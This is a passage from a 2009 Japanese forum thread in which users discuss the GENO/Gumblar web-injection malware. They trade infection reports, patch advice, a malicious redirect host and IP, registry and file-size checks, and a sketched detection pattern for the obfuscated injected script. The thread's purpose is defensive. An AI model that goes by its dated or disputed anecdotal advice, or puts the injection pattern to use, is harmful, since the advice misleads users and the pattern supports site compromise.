こだわるなよ



268 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 16:56:09 ]
>>263
IEは7から日本語ドメインに標準で対応
J-Wordもアドレスバーに文字を入れて日本語URLの検索できるが
普通J-Wordは使わないだろ

それと2ちゃんは日本語URLが貼れても機能しないんだよな

269 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 17:04:27 ]
うちのパソコンはNoscript すり抜けはしないけれど、
保険で他にも複数IFRAME対策等を入れているから
一つや二つの対策ソフトがバグっても安心です

270 名前:名無しさん@お腹いっぱい。 [2009/07/27(月) 17:09:26 ]
こだわりやな

271 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 17:15:37 ]
シンプルかつ効果的な対策をモットーにしてますw
まだまだXPも現役だからUACに頼らない対策もしてるよ

272 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 17:21:18 ]
どこまで再現出来るかは分からないがXPユーザーでも
UACもどきな非公式ソフトやノートンの制御設定で似たような事ができるかも

273 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 17:36:45 ]
2kやXPでVistaのUACモドキなことをやってたから
Vista出たときUACの使い勝手の良さに感動したけれど
巷では最低の評価だったなぁ…

274 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 18:24:17 ]

ブログの中の人、かわいそう
だれか、助けてあげて

275 名前:名無しさん@お腹いっぱい。 [2009/07/27(月) 18:25:47 ]
あんたが余計な事をやったんじゃないの

276 名前:名無しさん@お腹いっぱい。 [2009/07/27(月) 18:41:37 ]
リカバリー推奨

277 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 18:50:33 ]
俺たちのリカバリー・ナイト
おまえリカバリ



278 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/28(火) 13:58:05 ]
GENOの歩き方
tsushima.2ch.net/test/read.cgi/news/1248744891/

279 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/30(木) 17:08:16 ]
どうでもいいけどセキュリティ板にFlashとadobe readerの専用スレたてろよ
どうみてもあちこち集中攻撃受けていて、今旬のこの板の花形ですがな

280 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/30(木) 17:21:15 ]
必要だと思うなら自分でたてろよカス

281 名前:名無しさん@お腹いっぱい。 [2009/07/30(木) 21:41:34 ]
セキュリティ板は高スキルが求められる
厨房らには荷が重すぎたってわけよ

セキュリティソフトが扱えるだけでは芋扱いされるだけだしな

282 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/31(金) 05:39:13 ]
ようやくflash playerが更新

283 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/31(金) 14:16:55 ]
情報元は忘れたんだが、
watch_akibaのTwitter ↓ がよく利用している
twitter.com/watch_akiba

twitpic.com(174.36.0.0 - 174.37.255.255) って危ないのか分かる人いない?

数週間前にどこかのサイトを元にファイアーウォールのブロックIPにガンガン登録していったら、
この範囲をドンピシャで登録していたみたなんだが、とんでもない数の利用者が存在するはずだから、
本当にヤバイのか、自分がボケていただけなのか分からなくなった。

watch_akibaのTwitterにいって、画像リンクを踏むとtwitpic.comにつながるよ。

>>253
ペアレンタルコントロールとかで、ドメイン指定ブロックだと危ないから
リモートIPでブロックしていれば安心ってことかな?

284 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/01(土) 04:08:51 ]
Adobe Reader更新きました

285 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/08(土) 21:58:31 ]
 

286 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/15(土) 17:47:13 ]
結局大手のアンチウイルスソフトで対策できてるところは未だにないの?

287 名前:名無しさん@お腹いっぱい。 [2009/08/15(土) 21:05:12 ]
そもそも被害者いないもん
架空のウイルス



288 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/17(月) 12:35:59 ]
と思いたいgeno社員乙

289 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/17(月) 14:56:50 ]
既出かもしれんが
ちんこアプロダっていう同人誌うpしてるサイトがGENOウィルスに感染してることが判明した。
たまに見てた奴とかは気をつけろよ。

しばらくはアクセスしない方がいい。

290 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/17(月) 22:16:20 ]
5月の話じゃねーか。

291 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/17(月) 23:55:26 ]
ちんこアプロダ
危険度0%
安全なURLです。踏んでも大丈夫でしょう。

292 名前:名無しさん@お腹いっぱい。 [2009/08/19(水) 15:27:34 ]
ウイルスバスターのフィッシングレベルを高にすれば
GENOウイルス系をほぼ100%防げるってあったけど
ウイルスバスターって意外と凄いんだな

293 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/19(水) 20:55:03 ]
安全なサイトもほぼ100%ブロックされますけどね

294 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/20(木) 00:01:00 ]
ttp://www.itmedia.co.jp/enterprise/articles/0908/19/news020.html
相次ぐサイト改ざん攻撃、「Genoウイルス」感染PCが関与か

原因を調べたところ、この顧客がホスティングサーバへのファイルアップロードに
使っていたPCが、「Gumblar」(別名JS-Redir、 Genoウイルス)タイプのマルウェアに
感染していたことが分かったという。ただし5月に出回ったGumblarとは異なる点もあり、
コードに手を加えた亜種の可能性もあるとしている。

295 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/20(木) 00:10:35 ]
バスターって確かGENO発生当初にこのウイルス対策をユーザーから問われて
「履歴を消してください」
と答えた素敵な会社だっけ。

296 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/20(木) 00:14:17 ]
>>GENOウイルス(通称)に御社は対応済でしょうか?

   ___     ∧∧
  / || ̄ ̄||  ./台 \ ・・・・
  |  ||脅威||  (ハ´;; ) 
  | ̄ ̄\三⊂/ ̄ ̄ ̄/
  |    | ( ./     /


     カタカタ カタカタ
   ___     ∧∧
  / || ̄ ̄||  /台. \ ?! GENOウイルスって何アルカ??
  |  ||安心||  (`ハ´* ) 
  | ̄ ̄\三⊂/ ̄ ̄ ̄/
  |    | ( ./     /

297 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/08/21(金) 18:26:11 ]
バスターさんはWinnyグループの一員だからなぁ



298 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/03(木) 23:40:06 ]
ほす

299 名前:名無しさん@お腹いっぱい。 [2009/09/05(土) 08:00:10 ]
■新型の「Webウイルス」が感染拡大
pc.nikkeibp.co.jp/article/trend/20090722/1017170/?set=rss

セキュリティ会社や組織は5月中旬、「Gumblar(ガンブラー)」などと呼ばれる新たなWebウイルス(Webページに埋め込まれるタイプのウイルス)が
世界中で感染を広げているとして注意を呼びかけた。
脆弱(ぜいじゃく)性のあるパソコンでは、Webウイルスが埋め込まれたページにアクセスするだけで被害に遭う恐れがある。実際、国内でも多くの被害が報告されている。




■09月04日のWeb改竄情報
https://www.netsecurity.ne.jp/9_13925.html
■09月03日のWeb改竄情報
https://www.netsecurity.ne.jp/9_13910.html

300 名前:名無しさん@お腹いっぱい。 [2009/09/05(土) 11:20:10 ]
あのーすみません、
当初お菓子やさんだかなんだか休日に
電凸するかとか言ってる時居たんだけど
まさかまだ放置なの?
そろそろ許してやるかってGENO見ようとしたんだけど…

301 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/11(金) 05:25:39 ]
あれ、GENOウイルスチェッカーとか言うサイト繋がらないけど閉鎖したのか?

302 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/11(金) 05:48:34 ]
さすが糞さいと

303 名前:名無しさん@お腹いっぱい。 [2009/09/13(日) 23:39:45 ]
再起動画面のまま、何度再起動させても電源切っても全然起動出来ないです。GENOでしょうか…
対策何もしてなかったので。
どうしたらいいのかわからないです
もうパソコンは二度と起動しないのでしようか。

304 名前:名無しさん@お腹いっぱい。 [2009/09/13(日) 23:45:30 ]
セーフモードでやってみ?
だめならCDブートだ。(OS再インストール)

305 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/13(日) 23:55:53 ]
>>304 セーフモードだめです
OS再インストール…はやってないです。いつも使ってないスクリーンセーバーをダウンロード&設定した後だったのでそのせいだ 休ませれば直ると信じたかったのですが…。orz

早いレスありがとうございました。

306 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/14(月) 03:27:04 ]
CMDがいつのまにか起動
パソコン重い
しかしファイルサイズは正常
別のウィルスだなこれは……

307 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/17(木) 14:06:43 ]
avastで駆除できたっぽい。
sqlsodbc.chmが消えたし。win2000



308 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/20(日) 01:27:53 ]
やっぱavast凄いな

309 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/20(日) 05:03:51 ]
208.87.

310 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/20(日) 14:23:39 ]
win2000でavastで削除してsqlsodbc.chmを消去して
その後また復元してなければ大丈夫?

311 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/20(日) 16:46:18 ]
GENO感染したのですが、
個人情報流出は具体的にどの程度なんでしょうか?
保存してるファイルも流出してしまいますか?

PC素人です。
どなたか教えてください。

312 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/22(火) 13:00:12 ]
梨花ブログが感染してて、連休中で対処できてないからエライことになってる。

313 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/22(火) 13:40:57 ]
行ってないからわからんけど貼られてる広告にやられてるのかな
りんかもとんだとばっちりだな

314 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/22(火) 16:36:57 ]
>>313
ちょうど連休前の金曜の夜からおかしくなって、スタッフも休んでるのか未対応。
メッセージもスタッフ通してから梨花に送られてるみたいで、本人も知らずに更新しまくり。
梨花スレは大混乱。

315 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/22(火) 16:45:44 ]
確かGENOも休み中にやられたんだったよな
ブログ見てPCリカバリとかマジ最悪だね
PC詳しくない奴はどうするのか
自分の手に負えない奴もいっぱいいそうだ

316 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/22(火) 17:12:23 ]
>>315
梨花ブログ見る層はパソコン詳しい人あんまりいなさそうだからね。
私もその1人で、不安になってこのスレ来てみました。
ファイル名を指定して確認?したら一応大丈夫そうだったけど、亜種もあるみたいだから油断できませんよねー
ほんとうろたえてますw

317 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/22(火) 17:17:57 ]
FlashPlayerは最新に
PDFReaderも最新に
JavaScriptは基本的に切っておく
これでだいたいは防げるはず
初心者はIEを使うよりもFireFox+NoScript使用のほうが安全



318 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/22(火) 19:51:19 ]
コマンドプロンプトが立ち上がればよかった筈だが

319 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/22(火) 20:58:13 ]
vistaにしてUACを使う
が一番いい

320 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/23(水) 00:45:48 ]
vista+UAC+砂箱

これで核級のウイルスがきても全部シャットアウト

321 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/23(水) 04:35:30 ]
win2000でavastで削除してsqlsodbc.chmを消去して
その後また復元してなければ大丈夫?

322 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/23(水) 05:03:28 ]
>>320
全部はシャットアウトできない
砂箱にもUACにもどうせ穴がある

323 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/23(水) 21:25:32 ]
アーモー大騒ぎ

324 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/24(木) 12:53:16 ]
ウィルスバスターでGENOウィルスが隔離されていました。
まとめサイトにある確認法で調べたら、
cmdの値?が正常ではなく、低いままでした。
まだ感染しているということでしょうか?


325 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/25(金) 00:07:07 ]
一度感染したという事は既にシステムがぼっこボコにされている可能性が高いから
クリーンインストールした方がいいと思うんだ。

326 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/25(金) 15:25:28 ]
>>325
システム?もやられるのか?
俺もavastで知らぬうちに削除してて(たぶん)その後、変な挙動はないのだが

327 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/25(金) 16:12:13 ]
>>326
カスペとかノートンのオンラインスキャンして見て検出なければいいじゃね?

オレは精神衛生上の問題でクリーンインストールするけどね



328 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/25(金) 16:13:43 ]
kスペでやったけど問題なかったよ

329 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/29(火) 05:04:20 ]
genoじゃないがサイト巡回してたらノートンのIDセーフ(かなりいい加減)が真っ赤になったから
ソース確認したら本当に埋め込まれててふいたw
activexの脆弱性を突くタイプでvista/firefoxじゃなかったら感染していたんだろうな

330 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/30(水) 12:58:01 ]
萌えミシュラン感染してる

上記サイトのソースの中に
変なURLの記述がある
(.ruのロシアのサイト?)
改竄されたみたい。

管理人が気付いて
「当サイトのトップページが改竄されました」
っていう文章に内容が変わってるけど
それも改竄されて
また別のロシアのサイトのURLが…

331 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/30(水) 15:59:47 ]
そのロシアのサイトのページは空
今のところ無害

332 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/30(水) 16:39:01 ]
と思ったが何かうまくやって
空のページが表示されるときがあるのかもね
無害は取り消し

333 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/09/30(水) 23:52:30 ]
>>330
Googleだと危険なサイトと表示されるね
ttp://www.google.com/safebrowsing/diagnostic?site=moem.hp.infoseek.co.jp/&hl=ja


334 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/01(木) 01:22:48 ]
>>330
行ったことがないサイトだけど報告ありがとう。

335 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/01(木) 08:27:01 ]
今さっきGENOウィルスの存在を知った
片っ端から調べて、うちのPCもチェックしたが、感染してなかった

とりあえず

OS→Vista
ブラウザ→FireFox最新版
セキュリティ→ノートン2009
・Adobeリーダー&フラッシュプレイヤーをアップデート
・Javaスクリプトオフ
・Adobeリーダーのスクリプトもオフ
・今後しばらくネットは可能な限り携帯でカバーする予定

て感じなんだが、なんかまだまずいことある?
5月ごろまでの情報しか探せなかったんだよ…今現在でもこの対策で大丈夫なのか教えてくれ
これだけは調べきれなかったんだ、すまん

336 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/01(木) 09:14:35 ]
Windows updateもしておけ

337 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/01(木) 09:44:15 ]
>>336
サンクス
いまやってる
あとUACもオンに直しておいた

このウィルス自体は今はとりあえず全く動き(新種出たとか)はないと思っていいの?



338 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/01(木) 09:47:45 ]
Vistaには無害

339 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/01(木) 09:53:10 ]
>>338
あれ、俺が見たサイトにはご丁寧にVistaのチェック方法なんて載ってたんだが…
それはなぜなんだぜ?無害なら必要なくね?
純粋に疑問

340 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/01(木) 09:57:18 ]
用心しろってことじゃね
無害だよ
GENO自体はもう見ないけど
似たような物もあるし用心はしておいた方が良いってことじゃね

341 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/01(木) 10:08:43 ]
>>340
ありがとう
今ざっと調べてきたが、「今のところ無害だが油断はできない」みたいだな

ひとまず落ち着いてはきたんだな
これをいい機会に気をつけるわ
本当助かった
皆ありがとう

342 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/02(金) 01:10:52 ]
初期にはvistaでもウィルスにかかってた人がいたからな。UACを切ってたせいで。
だからまぁ、vistaでもたまにはsqlsodbc.chmのファイルサイズが
50,727 バイトであることを確認しておくのも悪くない。

343 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/02(金) 01:16:51 ]
それは嘘だろ

344 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/02(金) 01:24:12 ]
vistaが安全かどうかに関係なく
GENOはVistaやServer2008は最初から除外してる
UACは無関係
感染は嘘

345 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/02(金) 17:38:58 ]
UAC無効だとGENO”以外”での似たような構造を持ったウィルスの感染例はあるな
GENOそのものはXPを切り捨てるだけでOK

346 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/02(金) 22:42:50 ]
>>338

UACをOFFしてあるならアウト
あちこちの初心者サイトでOFFにするおすすめが載っている現状で
その結論は危険

347 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/02(金) 22:44:59 ]
何を言ってるんだ君は



348 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/02(金) 22:56:17 ]
適当な糞アフィサイトに騙されとる

349 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/02(金) 23:04:19 ]
なんか勘違いする人もいそうなので
>>346
Gumblarはたはgenoウイルス と呼ばれる物について話してる
これに関してはVistaは対象外ということ
Vistaが他の攻撃に安全と言ってるわけではない

350 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/10(土) 13:08:04 ]
イラストサイトの
Pafe Cafe
red.sakura.ne.jp/~izumi/
感染してた。(現在は対策済み)

Googleキャッシュにはもう残ってないが
百度のキャッシュには残ってた。

HTMLのソースコードはavastで
HTML:Illiframe-C [Trj]として反応

soul-of-man.ru:8080/index.php
(IPアドレス:85.17.138.27)
に飛ばそうとしてたみたい。

萌えミシュランが感染した時も
いくつかのサイトに飛ばそうとしてたが、
その中に85.17.138.27もあったと記憶している


351 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/10(土) 21:24:17 ]
>>350
脆弱性が使われてたの?

352 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/11(日) 22:48:16 ]
>>351
上のサイト(.ruドメインの方)に
アクセスすれば
脆弱性を付く不正なPDFファイルとか
不正なフラッシュファイルとか
ダウンロード出来ると思う。

アクセスしたくないけど。

そういうサイトに無理矢理、強制で
誘導しようとしてた。

353 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/12(月) 06:23:50 ]
>>352
恐ろしいな。
既存の脆弱性ならいいんだけどね。

354 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/18(日) 23:37:04 ]
GENOウイルス感染したかも・・・。
ヤバイと思ってPC電源切っちゃったあと
起動しようとしてもPC再起動繰り返す
(多分ブルースクリーン)ようになったから
もう確認のしようがないけど。

何か勝手にアドビリーダー開いたり
謎のtmpファイルを勝手に開こうとしたり
コマンドプロンプトで一瞬何かやってたので
GENOウイルスで間違いないと思う。

どうやってデータ復旧しようか考え中。

355 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/18(日) 23:40:43 ]
>>354
あらかじめ対策ってとってましたか?
もし、とってても感染したなら焦るのでよければ教えてケロ。

356 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/18(日) 23:47:25 ]
>>355
GENOウイルスの存在自体知らなかったので対策はとってませんでした。
ただAdobeReaderとIEのFLASHは9月中に一回アップデートしていました。
しかし今回はOperaを使ってHP閲覧してて、
IEのFLASHはアップデートしててもOperaのFLASHは古いまま
だったのが敗因のようです。

357 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/18(日) 23:57:07 ]
>>356
d
他スレでまた活動始めたなんて話も聞くので、
新たな対策が必要なのかな、と少し焦りました。

adobeは最近頻繁にうpデートするから注意必要ですね。
データ復旧マンドクサだろうけど、がんばってケロ。



358 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 00:02:53 ]
>>356
Readerの最新は10月14日だからそれもアウトだね。

359 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 00:13:19 ]
他スレに貼ったやつだけど貼っとく
今回はMS09-043あたりもからんでるみたいだからMicrosoft Updateもしてね

対策
・MSUpdateをする
 www.update.microsoft.com/microsoftupdate/v6/default.aspx?ln=ja
・Adobe Reader(Acrobat, Acrobat Reader)を使ってないならアンインストール
 使ってる場合は9.2.0に更新
 インストールの有無はプログラムの追加と削除から確認
 DLサイト
 get.adobe.com/jp/reader/
・Adobe Flash Playerの更新(動画サイト見てるなら絶対入ってる)
 最新は10.0.32.18
 確認はこれ
 www.adobe.com/jp/software/flash/about/
 DLサイト
 get.adobe.com/jp/flashplayer/

360 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 00:16:01 ]
Flash PlayerはIEとそれ以外で違うよってのも追記だな

361 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 00:36:11 ]
Adobe ReaderもAdobe Flash Playerも削除したよオレ。
どうせ使わないし。

362 名前:名無しさん@お腹いっぱい。 [2009/10/19(月) 02:01:29 ]
2009.10.18 日曜日 (手抜き版)
www3.atword.jp/gnome/2009/10/18/oct-18-09-sun-rapidly/
Gumblar strikes back?
[EMERGENCY]
先日、さまれぼ!管理人様より警報を受け取っていたのですが、Gumblarに強いScanSafeも警報を発しました。
Gumblar Website Botnet Awakes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
sqlsodbc.chm
という、悪夢のキーワードをもった Gumblar(GENO/zlkon/Martuz/JSRedir-R/Daonol)が、蠢動を再開した模様です。

現時点で使用されている脆弱性は
MS09-043 : Microsoft Office Web コンポーネントの脆弱性により、リモートでコードが実行される (957638)
という、9月に塞がれたものですが、それ以外にも脆弱性攻撃を仕掛けてくる可能性がありますので注意が必要です。

※マイクロソフト セキュリティ情報 MS09-043 - 緊急
www.microsoft.com/japan/technet/security/bulletin/MS09-043.mspx

363 名前:354 mailto:sage [2009/10/19(月) 02:59:26 ]
お騒がせしました。
感染したHDDを他PCに取り付けてウイルスチェックしたところ、
GENOウイルスではなかったようです。
何らかのサイトを見たことによってAVCareというソフトが
インストールされてしまったようです。
(いかがわしいサイトではありません。遊戯王のCDについて
調べていたときに起きた出来事です。)

他にもトロイが2、3個検出されていましたが、
いずれもGENOウイルスとは関係ないようでした。

症状が似ていた理由は不明ですが、sqlsodbc.chmの
ファイルサイズが正常だったことから見ても
GENOウイルスの感染ではなかったようです。

しかし、HPを見るときに注意することに越したことは
ないみたいですね。もしかしたら似た仕組みで
インストールされたのかもしれないので・・・。

364 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 03:23:48 ]
>>363
最新版のGeno亜種は検出できるの少ないみたいだから無いとは言い切れないよ
つーかそんだけいろいろ感染してた状態ならOS入れなおしたほうがいい

365 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 07:33:35 ]
今回のはC:\になんとか.bakってのを常駐させるくさ
(ファイル名ランダム)。

366 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 10:55:17 ]
再襲来したGENOウイルスについて報告してるブログみつけた。
ttp://blogs.yahoo.co.jp/noooo_spam/59011285.html
ttp://blogs.yahoo.co.jp/noooo_spam/59020592.html
ttp://blogs.yahoo.co.jp/noooo_spam/59029561.html

zlkon/gumblar/martuzは単一ホストでウイルスを撒いてたけど、
今度のスクリプトだと陥落した別サイトで撒いてるから、
従来のチェッカーじゃ判別できないな。

367 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 13:03:32 ]
糞通販ショップGeno ウイルス再び
tsushima.2ch.net/test/read.cgi/news/1255886283/



368 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 13:09:47 ]
今回もAvastはスクリプトを検知出来るようだ。

369 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 13:27:45 ]
>>368
いくつかパターンがあるみたいだけどそのうち1つは反応した
もう1つはスルー
他はわからん

370 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 13:45:01 ]
>>366
チェッカーは知らんけど挿入位置は同じっぽいな

371 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 14:10:55 ]
もう少し詳しく挙動を解説したブログ
ttp://ilion.blog47.fc2.com/blog-entry-154.html

ウイルスをホスティングしてる改竄サイトが無数にあるわけだ。
もぐら叩きだな、これじゃ・・・

372 名前:名無しさん@お腹いっぱい。 [2009/10/19(月) 14:16:15 ]
感染してるサイトのurlをチェッカーに突っ込んでみたが、危険度0.5%
でスルーされた。


373 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 14:18:24 ]
あんなの誰も使ってないだろ

374 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 15:11:31 ]
今回のはだめだ…HTMLソースにこれあったら確実にアウト、みたいなルールが作れねぇ。

375 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 15:38:50 ]
何したいんだかわからんけど>>366見た感じこれでよくね
.php ></script><body>

PHPファイルも見れるならこんな行があるか見るとか
eval(unescapse(*.replace(/[*]/g,*)));

だいたいこんなパターンでそ
//<script>
try{if(hoge='適当な文字')throw new TypeError('');}catch(){}
moge='難読化コード';
eval(unescapse(hoge.replace(/[huga]/g,hoge)));
ここに何かあるときもある
//</script>

376 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 15:40:18 ]
.php ></script><body>
これじゃ有害とは断定できねーべ
踏み台側のを拾いに行くのも正直めんどい

377 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 16:08:02 ]
何したいのかわからん
誤爆率そこまで高くないと思う
まったくないわけじゃないだろうけど
ローカルでやるには気にするほどではないレベル



378 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 20:22:44 ]
ttp://www.ripping.org/

某スレでこのスレが紹介されていたので来ました
上記サイトなんですが、検索エンジン(google)の結果の地点で警告が出るのですが
サイト上に何か仕込まれているんでしょうか?
一見、何の変哲もないPC関係のサイトのように見えますがブラウザレベルでもブロックをくらうようです

379 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 20:51:24 ]
「今は」特に何もないけど。

380 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 20:57:50 ]
>>378
safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=ja&site=http://www.ripping.org/
疑わしいサイトとして認識されています。
このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
不正なソフトウェアは t-age●ru/ を含む 1 個のドメインでホストされています。

この結果を使用しているFirefox、Chromeで見るとアウト判定になる

いまは見た感じなさそうだけど、攻撃スクリプトを誰が削除したのかわからないから
うかつに見ないほうが良いだろうね

381 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/19(月) 21:22:30 ]
>>379,>>380
大変参考になります
有難う御座いました

382 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/20(火) 14:59:19 ]
セキュリティホールmemo
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2009/10.html#20091020

リンクだけだけど、大御所来た。これでボンクラ鯖管も注意を払うといいが…

383 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/20(火) 22:39:31 ]
>>382
おっかないから
「aguseゲートウェイ(代理読み込み)」
gw.aguse.jp/
を使って見てきた俺ガイル orz

384 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/21(水) 01:16:42 ]
>>383
石橋を叩いて人に渡らせる行為をなにも恥じることはあるまい。

385 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/21(水) 03:43:01 ]
334 名前:GENO 投稿日:2009/10/20(火) 17:13:09 ID:pXNvHr1I0
ここ見てあちこちGENOスレ回ってきたら

> 感染したまま放置されてたサイトや、
> 対策が不十分だったサイトを見たら、さっそく変なスクリプト発見・・・

マジすか・・・


335 名前:GENO 投稿日:2009/10/20(火) 17:24:34 ID:mGYwobiA0
>>334
マジです。

たとえばGenoVirus感染サイトリストに出てる「対策済み」サイトの中にも、
再感染してるのがある。
もっと言えば、告知なしで再開してるサイトの一部。
告知なしで再開して、再感染したところは、
管理者が根本的な対策(OSの再インストール→サイトの復旧)を
やってなかった(自分のPCの感染に気づいていない)んでしょう。。。

386 名前:名無しさん@お腹いっぱい。 mailto:age [2009/10/21(水) 12:41:35 ]
ttp://www.weekenddream.jp/keiba_news/cat70/20091021_1.html
JRAレーシングビュアーでサイト改ざん ウイルス感染の疑い(2009.10.21)

株式会社中央競馬ピーアール・センターは20日(火)、
JRAレーシングビュアーの一部ページが一時改ざんされ、
改ざんされた期間中にサイトを閲覧した会員が
ウイルスに感染した疑いがあると発表した。

サイト改ざんされた疑いのある期間は
15日(木)18時から20日(火)13時までの間。
この期間中に悪意のあるコードがサイト内に埋め込まれ、
サイトを閲覧すると
"Gumblar"または"JSRedir-R"
(通称「GENOウイルス」とも呼ばれる)
に感染する可能性が生じたとのこと。
サーバー管理会社に調査依頼の上、
現在はこの悪意のあるコードはすべて除去され、
ウイルス感染の心配はないとのこと。
またこのサイト改ざんによる
個人情報の流出はないとのこと。

387 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/21(水) 21:36:08 ]
なぜこういうのをAdobeが作らないのか…。

Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
www.forest.impress.co.jp/docs/review/20091020_323014.html



388 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/21(水) 22:02:37 ]
>>386
レーシングビュアーは会員向けの有料サービスなのか
ホームページには普通にアクセスしてたからビビったけど
とりあえず害は及ばずといったところか
しかしJRAがGENOウイルスとハッキリ認識しているとは
GENOの知名度って想像以上に高いなあ

389 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/22(木) 00:07:15 ]
>>387
これはいい

390 名前:名無しさん@お腹いっぱい。 [2009/10/22(木) 10:14:21 ]
おれ素人だけどGENO見終わって閉じようとしたら何回やってもだめで
怖くなって電源切った。これだったのかウィルスソフトはいれてますが。
